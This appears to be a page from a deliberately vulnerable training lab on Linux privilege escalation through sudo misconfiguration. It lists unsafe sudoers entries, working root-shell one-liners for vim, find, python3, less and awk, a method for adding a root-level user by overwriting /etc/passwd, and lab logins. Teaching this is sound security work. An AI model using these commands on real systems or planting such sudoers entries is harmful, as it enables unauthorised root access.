🐧 Linux Privilege Escalation Lab

PRACIVO LAB — INTENTIONALLY VULNERABLE
Home Login SUID Binaries Sudo Misconfig Cron Jobs PATH Hijack Writable /etc/passwd Env Variables
⚠️ Pracivo Security Lab — Linux privilege escalation techniques. Start as a low-privilege user and escalate to root.
Lab Credentials: ram / pracivo  |  alice / alice123  |  root / toor (goal: escalate to this)

Sudo Misconfiguration

PRIVILEGE ESCALATION 
# Check what you can run as sudo (no password required):
sudo -l

# Vulnerable /etc/sudoers entries:
ram ALL=(ALL) NOPASSWD: /usr/bin/vim        ← can escalate
ram ALL=(ALL) NOPASSWD: /usr/bin/find       ← can escalate
ram ALL=(ALL) NOPASSWD: /usr/bin/python3    ← can escalate
ram ALL=(ALL) NOPASSWD: /usr/bin/less       ← can escalate
ram ALL=(ALL) NOPASSWD: /usr/bin/awk        ← can escalate
ram ALL=(ALL) NOPASSWD: /bin/cp             ← can overwrite files as root
ram ALL=(ALL) NOPASSWD: /bin/chmod          ← can chmod any file

# Exploit: sudo vim
sudo vim -c ':!/bin/bash'

# Exploit: sudo find
sudo find . -exec /bin/bash \; -quit

# Exploit: sudo python3
sudo python3 -c 'import pty; pty.spawn("/bin/bash")'

# Exploit: sudo less
sudo less /etc/passwd
!/bin/bash

# Exploit: sudo awk
sudo awk 'BEGIN {system("/bin/bash")}'

# Exploit: sudo cp — overwrite /etc/passwd
# Generate a password hash first:
openssl passwd -1 -salt hacker hacker123
# Output: $1$hacker$...hash...

# Copy your modified /etc/passwd with a new root-level user:
echo 'hacker:$1$hacker$HASH:0:0:root:/root:/bin/bash' >> /tmp/passwd
sudo cp /tmp/passwd /etc/passwd
su hacker  # password: hacker123